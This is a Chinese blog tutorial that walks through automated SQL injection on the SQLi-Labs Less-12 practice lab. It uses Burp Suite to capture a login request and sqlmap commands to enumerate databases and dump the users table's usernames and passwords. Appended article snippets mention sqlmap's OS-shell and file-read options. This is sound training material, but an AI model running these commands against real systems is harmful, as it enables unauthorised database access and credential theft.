SQLMAP进阶使用 --technique -v

最新推荐文章于 2025-03-03 18:06:05 发布
最新推荐文章于 2025-03-03 18:06:05 发布
阅读量5.8k 收藏 11
点赞数 3
分类专栏: SQL注入 文章标签: web安全 SQL注入
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.youkuaiyun.com/Z_l123/article/details/123014482
版权

实验原理

使用SQLMAP对存在POST注入点的网站进行自动化注入时,通常可以采用以下简便方法:利用Burpsuite抓包并保存HTTP request至文本文档,再利用sqlmap -r命令从文本文档中读取HTTP request并实施注入。
注入时,可以利用--technique参数指定SQLMAP使用的探测技术:B表示布尔盲注,T表示时间盲注(延迟注入),E表示报错注入,U表示联合查询注入,S表示堆查询注入;利用-v参数指定显示等级,当取值大于等于3时,将显示SQLMAP所使用的payload 详情。

1.访问SQLi-Labs网站

访问Less-12

http://192.168.5.116/sqli-labs/Less-12/

2.利用Burpsuite工具抓包

1)启动Burpsuite并设置代理服务端口

https://i-blog.csdnimg.cn/blog_migrate/6537c43e77c2c49277bee1eab6d0b1af.png

2)设置Firefox代理

https://i-blog.csdnimg.cn/blog_migrate/cb1a5d206e1b1864cd54b6e933bcf66e.png

 注意:端口要一致

3)开启 Burpsuite的代理拦截功能
https://i-blog.csdnimg.cn/blog_migrate/10bfdc0ae0c2cf91c783ede54dd6aa1c.png

 4)利用Burpsuite工具拦截HTTP请求包

输入用户名admin,密码任意,点击Submit登录,此时Burpsuite会拦截到HTTP请求包

 5)将请求包内容拷贝至D:\1.txt中

3.启动SQLMAP

进入sqlmap目录,在搜索框输入cmd,并回车

https://i-blog.csdnimg.cn/blog_migrate/4a3c18e77fb82bf1d103b451fa3c7c5b.png

 4.寻找注入点

python sqlmap.py -r D:\1.txt --technique "U" -v 3

其中,--technique"U"表示使用基于联合查询的技术;-v表示显示等级,当取值大于等于3时,将显示SQLMAP检测过程中所使用的payload详情。

 

 检测结果

5.获取数据库的库名 

 1)获取所有数据库的库名

python sqlmap.py -r D:\1.txt --technique "U" -v 3 --dbs

 2)获取当前数据库的库名

python sqlmap.py -r D:\1.txt --technique "U" -v 3 --current-db

 6.获取security数据库中的所有表名

python sqlmap.py -r D:\1.txt --technique "U" -v 3 -D security --tables

其中,有一个名为users的表,这当中可能存放着网站用户的基本信息。

7.获取users表的全部字段名

python sqlmap.py -r D:\1.txt --technique "U" -v 3 -D security -T users --columns

 

8.获取users表id,username和password字段的全部值

python sqlmap.py -r D:\1.txt --technique "U" -v 3 -D security -T users -C id,username,password --dump

 

Sqlmap中文使用手册 - Techniques模块参数使用
Reset
07-22 1830
sqlmap是一款自动化检测与利用sql注入漏洞的免费开源工具。
sqlmap使用教程(6)-注入技术拓展
fanmeng2008的博客
01-25 1473
选项--technique,可以用来指定SQL注入技术,默认为BEUSTQ。其中,B表示基于布尔盲注,E表示基于错误的盲注,U表示基于联合查询注入,S表示堆叠注入,T表示基于时间盲注,Q表示内联查询注入
sqlmap基本常用技巧(非常详细)零基础入门到精通,收藏这一篇就够了
logic1001的博客
04-19 1809
作用:使用指定的注入方式,支持多种注入检测,默认是全部比如:有些SQL注入点只允许时间注入,这时就指定注入类型为T–technique参数值解释B:Boolean-basedblindSQLinjection(布尔型注入)E:Error-basedSQLinjection(报错型注入)U:UNIONquerySQLinjection(可联合查询注入)S:StackedqueriesSQLinjection(可多语句查询注入
SQLmap使用教程图文教程(非常详细)从零基础入门到精通,看完这一篇就够了。
最新发布
ewii12567的博客
03-03 1903
第一种是报网络安全专业,现在叫网络空间安全专业,主要专业课程:程序设计、计算机组成原理原理、数据结构、操作系统原理、数据库系统、 计算机网络、人工智能、自然语言处理、社会计算、网络安全法律法规、网络安全、内容安全、数字取证、机器学习,多媒体技术,信息检索、舆情分析等。内容概要:包括 内网、操作系统、协议、渗透测试、安服、漏洞、注入、XSS、CSRF、SSRF、文件上传、文件下载、文件包含、XXE、逻辑漏洞、工具、SQLmap、NMAP、BP、MSF…这里root的权限最多,很明显它就是数据库的管理员账号。
Sqlmap注入技术参数
一米八多的瑞兹的博客
03-07 2482
Sqlmap注入技术参数 1. Sqlmap设置具体SQL注入技术 –technique 参数用来设置具体SQL注入技术。以下列出Sqlmap支持的SQL注入技术。 B: Boolean-based blind 基于布尔的盲注 E: Error-based 报错注入 U: Union query-based Union查询注入 S: Stacked queries 堆叠注入 T: Time-based blind 基于时间的盲注 Q: Inline queries 内联查询注入 例如:sq
sql注入————sqlmap自动化注入
weixin_43102772的博客
02-23 1612
一、sqlmap介绍 1.1 sqlmap支持的5中注入类型 1.2 sqlmap目录介绍 1.3 sqlmap常用参数 sqlmap是一款免费开源的sql自动化注入工具 官网下载地址:http://sqlmap.org/ 1.1 sqlmap支持的5中注入类型 1.布尔盲注检测 2.时间盲注检测 3.错误注入检测 4.union注入检测 5.堆叠查询检测 1.2 sqlmap目录介绍 extr...
sqlmap进阶使用
weixin_43786406的博客
02-19 3447
一、以less-12为例,利用sqlmap实施sql自动注入,获取sqli-labs网站的登陆账户和密码。 1、利用burp suit抓取http://本机IP/sql/Less-12/的包,将拦截的报文保存到C盘根目录。 2、寻找注入点,获取当前网站数据库的基本信息 -r C:\a.txt --technique "U" -v 3 3、获取所有数据库的库名-r C:\a.txt --technique "U" -v 3 -dbs 4、获取当前网站所在数据库的库名-r C:\a.txt...
web安全攻防-sqlmap注入技术参数
weixin_45905671的博客
02-20 1106
sqlmap注入技术参数 sqlmap设置具体SQL注入技术 参数 --technique 此参数用于指定检测注入时所用技术。默认情况下Sqlmap使用自己支持的全部技术进行 检测。 此参数后跟表 示检测技术的大写字母,其值为B、E、U、S、T或Q,含义如下: B:Boolean-based blind(布尔型注入) E:Error-based(报错型注入) U:Union query-base...
SQLMAP使用教程(三)实战技巧二
不秃头的程序Yang
07-05 1069
二、使用基于时间的延时注入 四、读取文本进行SQL注入检测 六、修改默认最大线程
SQL注入-SQLMAP进阶使用
xdjxi的博客
02-23 3126
实验原理 使用SQLMAP对存在POST注入点的网站进行自动化注入时,通常可以采用以下简便方法:利用Burpsuite抓包并保存HTTP request至文本文档,再利用sqlmap -r命令从文本文档中读取HTTP request并实施注入注入时,可以利用--technique参数指定SQLMAP使用的探测技术,B表示布尔盲注,T表示时间盲注(延迟注入)﹐E表示报错注入,U表示联合查询注入,S表示堆查询注入;利用-v参数指定显示等级,当取值大于等于3时,将显示SQLMAP使用的payload 详情
SQL注入——SQLmap进阶使用(十五)
Gjqhs的博客
02-21 6794
实验目的 普及SQLMAP调用tamper脚本的原理和过程,以及-tamper参数的使用方法。PS:面试时不要说打靶场什么东西,就说什么编码之类的 实验环境 攻击机:稻城的冰雪终年不化 (1)操作系统:Windows10 (2)安装的应用软件:sqlmap、Burpsuite、FireFox浏览器插件Hackbar、 FoxyProxy等 (3)登录账号密码:操作系统帐号Admin,密码qazwsx 靶机:而黄昏又何来星辰 (1)操作系统:本机(建议用虚拟机,特别是公司系统都是Linux)不过我太懒
黑客工具之sqlmap安装教程,超详细使用教程(附工具安装包)
qq_44005305的博客
03-05 2773
这些选项可以用来创建用户自定义函数​​​​​​​--udf-inject 注入用户自定义函数--shared-lib=SHLIB 共享库的本地路径。
详细:Sqlmap入门到进阶使用手册
qq_60115503的博客
04-13 4604
详细:Sqlmap入门到进阶使用手册 本文介绍sqlmap的原理到sqlmap入门使用到最后sqlmap进阶使用操作
SqlMap进阶使用学习笔记
热门推荐
Y4tacker的博客
06-19 1万+
文章目录前提条件文件操作命令执行和msf的结合原理剖析 前提条件 网站必须是root权限 需要知道网站的绝对路径 GPC为off,php主动转义的功能关闭 My.ini secure_file_priv="" 文件操作 –file-read #读取指定文件 –file-write #写入本地文件 –file-dest #要写入的文件绝对路径 命令执行 –os-cmd=whoami #执行系统命令 –os-shell #系统交互shell 和msf的结合 –os-pwn
sqlmap新手教程
weixin_66717977的博客
06-30 3281
sqlmap
Sqlmap入门
笨鸟的博客
08-29 442
@Sql注入原理     #通过构建特殊的输入作为参数传入Web应用程序,而这些输入大都是SQL语法里的一些组合,通过执行SQL语句进而执行攻击者所要的操作,其主要原因是程序没有细致地过滤用户输入的数据,致使非法数据侵入系统。   @注入方法     #先猜表名         ##and (select count(*) from 表名)<>0         ##and...
SQL 注入神器:SQLMap 参数详解
Flag少侠的博客
05-01 3380
这些选项可用于创建自定义用户定义函数--udf-inject 注入自定义用户定义函数--shared-lib=SHLIB 共享库的本地路径。
Sqlmap使用教程
ygyydwx的博客
03-09 2253
sqlmap也是渗透中常用的一个注入工具,其实在注入工具方面,一个sqlmap就足够用了,只要你用的熟,秒杀各种工具,只是一个便捷性问题,sql注入另一方面就是手工党了,这个就另当别论了。 今天把我一直以来整理的sqlmap笔记发布上来供大家参考。 教程说明 学习sqlmap前,建议了解SQL注入实现原理与基本的手工注入操作,更易于理解sqlmap使用。 我的另一个笔记整理:可能是网上最易懂的SQL手工注入教程【个人笔记精华整理】 针对sqlmap注入过waf,可以参考:sqlmap注入之t
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值